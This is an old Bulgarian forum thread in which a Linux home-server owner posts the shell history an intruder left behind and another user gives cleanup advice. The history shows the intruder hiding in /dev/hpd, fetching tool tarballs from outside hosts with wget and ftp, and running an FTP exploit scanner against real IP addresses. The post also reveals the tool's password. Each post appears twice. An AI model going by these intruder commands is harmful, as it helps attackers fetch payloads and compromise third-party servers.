Титла: Hack!! kakvo da pravia
Публикувано от: eureka в Nov 19, 2002, 14:42
Zdravej,
Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa.
Predi okolo mesec si pusnah kabelen internet, i tyj kato tova mi beshe neshto kato "detska mechta" - vednaga podkarah na ednin star Pentium na 188 Mhz RedHat 6.2.
Spriah pochti vsichko s izkliuchenie na DNS,http,Authentication service na port 113 /NE ZNAM KAK DA GO SPRA/, i kachih SSH2-non comersial version.
Configurirah go da rutira vsichko praz nego i s ipchains maskirah localnite adresi.
Kompiutyra raboti taka v prodyljenie na mesec kato az chat-pat vlizah za da pocykam (opitvah da si podkaram multi-ruter-trafo-grafer(ne sym)) ... i taka.
Predi dva dena se lognah i ostanovih che imam mail !!!
tochnia text ne moga da ti kaja ..
//za syjalenie dokato chovyrkah sym zatril mbox-a//
..no beshe neshto svyrzano s err pri logratate
zapochnah da se chudia i da "rychkam" za da ustanovia prichinata.. i se natyknah na stranni "pisania" v history-to:
789 exit
*********
790 cd /dev/hpd
791 cd /dev/hpd
792 cd /dev
793 mkdir hpd
794 cd hpd
795 ls
796 ftp lordice.ro
797 ls
798 tar -zvf 1.tar.gz
799 tar -xvf 1.tar.gz
800 tar -xf 1.tar.gz
801 tar -zxvf 1.tar.gz
802 ls
803 tar -zf 1.tar.gz
804 tar --help
805 tar -tvf 1.tar.gz
806 rm -rf 1.tar.gz
807 wget folositoare.go.ro/1.tar.gz
808 ftp 65.126.126.199
809 ftp 193.231.236.41
810 ftp 193.231.236.41
811 wget imperr.home.ro/darkbot-6f6-r6_tar.tar
812 ftp blabla.com
813 ftp alyla.net
814 ls
815 tar -xzvf darkbot-6f6-r6_tar.tar
816 cd darkbot6f6/
817 ls
818 cd dat
819 ls
820 cd ..
821 cd docs
822 ls
823 pico README
824 cd ..
825 cd../
826 pico
827 cd ..
828 ls
829 rm -rf bitchbot-1_0_2_tar.tar darkbot6f6
830 rm -rf darkbot-6f6-r6_tar.tar
831 tar -xzvf superwu.tar.gz
832 cd super-wu
833 ./superwu 64.18.125.90 21
834 ./superwu 64.244.71.19 21
*******
835 cd /mnt/cdrom
...
kakto mojesh da si predstavish uchudvaneto mi beshe super goliamo...
s enda 'last' command ustanovih che ima zapisi ot roda
**
ftp ftpd12124 pD9514DE2.dip.t- Tue Nov 5 14:50 - 14:53 (00
3)
ftp ftpd1645 telehouse-103-1- Fri Nov 8 09:39 - 09:40 (000)
ftp ftpd1276 206.48.88.103 Wed Nov 6 14:10 - down (03:12)
ftp ftpd872 160.40.15.54 Wed Nov 6 027 - down (15:16)
**
) .. ADOVA RABOTA ..
dokopah se do 'superwu' i pri startiranetpo mi iska password
v edna ot poddirectoriite otkrih 'README' v koeto pishe samo!!:
password:wegotelectricstyle
seshtash se che ia napisah ... i mi se poiavi
"Ask Electricy members for this"
ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li oshte ne
ot togava gi tyrsia i ne znam kakvo da pravia.
Obshto vzeto tova e. Razchitam na niakakvo mnenie i support
Pozdravi Eureka
PS
kak da spra authentication service na port 113
Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa.
Predi okolo mesec si pusnah kabelen internet, i tyj kato tova mi beshe neshto kato "detska mechta" - vednaga podkarah na ednin star Pentium na 188 Mhz RedHat 6.2.
Spriah pochti vsichko s izkliuchenie na DNS,http,Authentication service na port 113 /NE ZNAM KAK DA GO SPRA/, i kachih SSH2-non comersial version.
Configurirah go da rutira vsichko praz nego i s ipchains maskirah localnite adresi.
Kompiutyra raboti taka v prodyljenie na mesec kato az chat-pat vlizah za da pocykam (opitvah da si podkaram multi-ruter-trafo-grafer(ne sym)) ... i taka.
Predi dva dena se lognah i ostanovih che imam mail !!!
tochnia text ne moga da ti kaja ..
//za syjalenie dokato chovyrkah sym zatril mbox-a//
..no beshe neshto svyrzano s err pri logratate
zapochnah da se chudia i da "rychkam" za da ustanovia prichinata.. i se natyknah na stranni "pisania" v history-to:
789 exit
*********
790 cd /dev/hpd
791 cd /dev/hpd
792 cd /dev
793 mkdir hpd
794 cd hpd
795 ls
796 ftp lordice.ro
797 ls
798 tar -zvf 1.tar.gz
799 tar -xvf 1.tar.gz
800 tar -xf 1.tar.gz
801 tar -zxvf 1.tar.gz
802 ls
803 tar -zf 1.tar.gz
804 tar --help
805 tar -tvf 1.tar.gz
806 rm -rf 1.tar.gz
807 wget folositoare.go.ro/1.tar.gz
808 ftp 65.126.126.199
809 ftp 193.231.236.41
810 ftp 193.231.236.41
811 wget imperr.home.ro/darkbot-6f6-r6_tar.tar
812 ftp blabla.com
813 ftp alyla.net
814 ls
815 tar -xzvf darkbot-6f6-r6_tar.tar
816 cd darkbot6f6/
817 ls
818 cd dat
819 ls
820 cd ..
821 cd docs
822 ls
823 pico README
824 cd ..
825 cd../
826 pico
827 cd ..
828 ls
829 rm -rf bitchbot-1_0_2_tar.tar darkbot6f6
830 rm -rf darkbot-6f6-r6_tar.tar
831 tar -xzvf superwu.tar.gz
832 cd super-wu
833 ./superwu 64.18.125.90 21
834 ./superwu 64.244.71.19 21
*******
835 cd /mnt/cdrom
...
kakto mojesh da si predstavish uchudvaneto mi beshe super goliamo...
s enda 'last' command ustanovih che ima zapisi ot roda
**
ftp ftpd12124 pD9514DE2.dip.t- Tue Nov 5 14:50 - 14:53 (00
3)ftp ftpd1645 telehouse-103-1- Fri Nov 8 09:39 - 09:40 (00
0)ftp ftpd1276 206.48.88.103 Wed Nov 6 14:10 - down (03:12)
ftp ftpd872 160.40.15.54 Wed Nov 6 02
7 - down (15:16)**
) .. ADOVA RABOTA ..dokopah se do 'superwu' i pri startiranetpo mi iska password
v edna ot poddirectoriite otkrih 'README' v koeto pishe samo!!:
password:wegotelectricstyle
seshtash se che ia napisah ... i mi se poiavi
"Ask Electricy members for this"
ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li oshte ne
ot togava gi tyrsia i ne znam kakvo da pravia.
Obshto vzeto tova e. Razchitam na niakakvo mnenie i support
Pozdravi Eureka
PS
kak da spra authentication service na port 113
Титла: Hack!! kakvo da pravia
Публикувано от: savel в Nov 19, 2002, 15:34
o4evidno nqkoi te e "root-nal" , demek hack-nal
pyrvo ako ti e localno mashinata spri vsi4ki remote login demoni
dori vsi4ki ostanali
sled koeto pregledai kakvito logove sa ti ostanali i ako mojesh ottam
razberi koga , kak i etc.
proverqvqsh /etc/passwd za dobaveni users i triesh ako ima symnitelni
v /etc/inetd.conf preglejdash za dobaveni services koito da slujat kato backdoor i gi mahash ako ima takiva
sled koeto killall -HUP inetd
poglejdash za symnitelni procesi s ps , ili netstat
tyrsish i ostaveni setuid root files
za kernel root kit malko trudno she proverish , nai-sigurno e upgrade na kernela ot rpm ili src
update-vash si i ftp, httpd , dns i t.n.
a vyzmojno e da sa podmeneni i /bin/login i /bin/su primerno
uspeh
a i oshte neshto
hacker4eto si e napravilo dir v /dev, /dev/hpd
razgledai i q iztrii
ps syshto moje da e podmenen za da krie opredeleni procesi...
authentication se spira kato comment-nesh reda za identd v /etc/inetd.conf , i sled tova restartirash inetd
pyrvo ako ti e localno mashinata spri vsi4ki remote login demoni
dori vsi4ki ostanali
sled koeto pregledai kakvito logove sa ti ostanali i ako mojesh ottam
razberi koga , kak i etc.
proverqvqsh /etc/passwd za dobaveni users i triesh ako ima symnitelni
v /etc/inetd.conf preglejdash za dobaveni services koito da slujat kato backdoor i gi mahash ako ima takiva
sled koeto killall -HUP inetd
poglejdash za symnitelni procesi s ps , ili netstat
tyrsish i ostaveni setuid root files
za kernel root kit malko trudno she proverish , nai-sigurno e upgrade na kernela ot rpm ili src
update-vash si i ftp, httpd , dns i t.n.
a vyzmojno e da sa podmeneni i /bin/login i /bin/su primerno
uspeh
a i oshte neshto
hacker4eto si e napravilo dir v /dev, /dev/hpd
razgledai i q iztrii
ps syshto moje da e podmenen za da krie opredeleni procesi...
authentication se spira kato comment-nesh reda za identd v /etc/inetd.conf , i sled tova restartirash inetd